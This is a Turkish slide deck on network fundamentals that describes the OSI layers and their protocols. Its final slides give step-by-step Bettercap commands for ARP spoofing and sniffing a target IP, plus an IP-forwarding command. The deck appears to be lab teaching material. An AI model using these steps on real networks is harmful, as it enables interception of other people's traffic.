Professional Documents
Culture Documents
NETWORK
FUNDAMENTALS
CHAPTER 5:
NETWORK
FUNDAMENTALS
TERMINOLOGY
Network Layer
• Ağ katmanı IP adresinin cihazlara tanımlandığı katmandır.
Bu işleme mantıksal adresleme - logical addressing de
denir.
• Bu katmandaki protokoller ağ adreslerini fiziksel
karşılıklarına çevirir (IPMAC) ve verilerin göndericiden
alıcıya nasıl yönlendirileceğine karar verir.
• Data link katmanında paketlenen veriler bu katmanda
taşınmaya başlar.
• Switching ve routing cihazları bu katmanda çalışmaktadır.
Bu katman sayesinde verinin router aracılığıyla
yönlendirmesi/aktarımı sağlanır. Switch ile de ağa bağlı
bütün cihazların bir biri ile haberleşmesi sağlanır.
• Bu katmanda kullanılan protokoller ise IP, ARP, RARP,
BOOTP, ICMP olarak sıralanabilir.
• Ağ katmanında veri iletiminin güvenli bir şekilde
gerçekleştirileceğinin garantisi verilmez.
CHAPTER 5:
NETWORK FUNDAMENTALS
Transport Layer
• Taşıma/iletim katmanı, oturum katmanından aldığı verinin uçtan uca taşınmasını sağlar.
• Paketlerin parçalara bölünüp birleştirilmesini ve hata kontrolünün güvenliğinden
sorumludur.
• Paketleme, büyük verileri küçük verilere bölme işlemlerinin bütünüdür.
• Transport katmanında paket hata ile karşılaşırsa, tekrardan gönderilir. Bu şekilde uçtan
uca veri iletiminin tutarlılığını sağlar.
• Paketin karşı tarafa gidip gitmediğinin kontrol edildiği katmandır ve port ayrımının
yapıldığı, hangi portun hangi uygulamayı dinlediğinin belirlendiği katman olarak bilinir.
• Firewall, Gateway, Load Balancer ekipmanları bu katmanda çalışır.
• Aşağıdaki protocoller bu katmanda çalışır:
• TCP (Transmission Control Protocol)
• UDP (User Datagram Protocol)
• SPX
• ESP
• Fiber Channel Protocol
• iSCSI
• SCTP
• GRE
• HSRP, VRRP, …
CHAPTER 5:
NETWORK FUNDAMENTALS
Session Layer
• Oturum katmanı, cihazlar arasındaki bağlantıları kontrol
eder. Yereldeki ve uzaktaki bağlantıları kurabilir, yönetebilir
veya sonlandırabilir.
• Bir makine üzerindeki işletim sisteminin müşterilerinin,
başka bir makine üzerindeki işletim sisteminin
müşterileriyle oturum açmasını ve iletişimini sağlar.
• Oturum katmanı çoğunlukla uzak yordam çağrısını kullanan
uygulama ortamlarında kullanılır.
• Bu katmanda kullanılan servislere SQL, Netbios, NFS
örnek olarak verilebilir.
• Bu katmanda sunum katmanına yollanacak veriler farklı
oturumlarla birbirinden ayrılarak yapılır.
• NetBIOS, RPC, Named Pipes ve Sockets gibi protokoller
bu katmanda çalışır.
CHAPTER 5:
NETWORK FUNDAMENTALS
Presentation Layer
• Sunum katmanı, uygulama katmanındaki varlıkların arasındaki iletişim
ortamının, farklı donanım işletim sistemleri bazında, gerçekleşmesini
sağlar.
• Sunum katmanının en önemli görevi yollanan verinin karşı bilgisayar
tarafından anlaşılacak şekilde çevrilmesidir. Bu sayede farklı
programların birbirlerinin verisini kullanabilmesi mümkün hale
getirilir.
• Sunum katmanı uygulama katmanına verileri yollar daha sonra bu
katmanda verinin yapısı, biçimi ile ilgili düzenlemeler yapılır. Verinin
formatı belirlenir. Ayrıca verinin şifrelenmesi, açılması, sıkıştırılması
da bu katman üzerinde gerçekleştirlir.
• GIF, JPEG, TIFF, EBCDIC, ASCII bu katmanda çalışır.
• Sunum katmanı, verileri uygulamaların kabul edeceği hale dönüştürür.
• Bu katman veriyi biçimlendirip şifreleyerek ağda gönderilmesini
sağlar. Bu yüzden syntax katmanı olarak da bilinir.
CHAPTER 5:
NETWORK FUNDAMENTALS
Application Layer
• Uygulama katmanı, kullanıcının gönderilen veya alınan verilerle
nasıl etkileşime girmesi gerektiğini belirleyen protokollerin ve
kuralların bulunduğu katmandır.
• Kullanıcıların gönderilen veya alınan verilerle etkileşime girmesi
için bilgisayar uygulamaları ile ağ arasında bir arabirim sağlar.
• OSI katmanları arasında diğer katmanlara servis sağlamayan tek
katmandır.
• SSH, telnet, FTP, TFTP, SMTP, SNMP, HTTP, DNS protokolleri
ve tarayıcılar bu katman üzerinde çalışır.
• Kaynak kullanılabilirliğine karar verirken, uygulama katmanı
ağın yeterli olup olmadığına ya da istenilen bağlantının var olup
olmadığına karar vermektedir.
• Kullanıcı yetkilendirme ve gizlilik dikkate alınır.
CHAPTER 5:
NETWORK FUNDAMENTALS
ARP Spoofing / ARP Poisoning / MAC Spoofing / ARP Based Sniffing Attack With Bettercap
Uygulamaya başlamadan önce sağlıklı sonuçlar alabilmek için mutlaka CTRL+SHIFT+DELETE tuş kombinasyonu ile
tarayıcı ön belleğini temizleyiniz.
Step 1……bettercap ……………….………...………….....…Bettercap i aç
Step 2……net.probe on…………………………………........IP mapping yap
Step 3……net.show………………………………….…...........IP Map ı aç
Step 4……set arp.spoof.fullduplex true…………….....Modem/router a arp gönder
Step 5……set arp.spoof.targets 192.168.1.214……..Hedef IP adresine arp gönder
Step 6……arp.spoof on……………………………….........…Arp Spoofing i başlat
Step 7……net.sniff.local true………………………........…Local ağdan gelen bütün paketleri dikkate alır.
Step 8...…net.sniff on……………………………….........…..Sniffing işlemini başlat
Step 9…...arp.spoof off / exit………………...….....……Arp Spoofing i kapat
CHAPTER 5:
NETWORK FUNDAMENTALS
ARP Spoofing / ARP Poisoning / MAC Spoofing / ARP Based Sniffing Attack With Bettercap
Not:
• Uygulama İçin Örnek Site: http://unicornitems.com
• Kurban internete giremezse 11. adım olarak terminal üzerinden IP_Forward işlemi yapmak gerekebilir.
Terminal üzerinde aşağıdaki komutu çalıştırın.
echo 1 > /proc/sys/net/ipv4/ip_forward
• ISP firmaları http protokolü kullanan sitelere erişim izni vermemekte ya da bu sitelere erişimi kısıtlamaktadır.
• Bettercap ekranın arama yapmak CTRL+SHIFT+F
CHAPTER 5:
NETWORK FUNDAMENTALS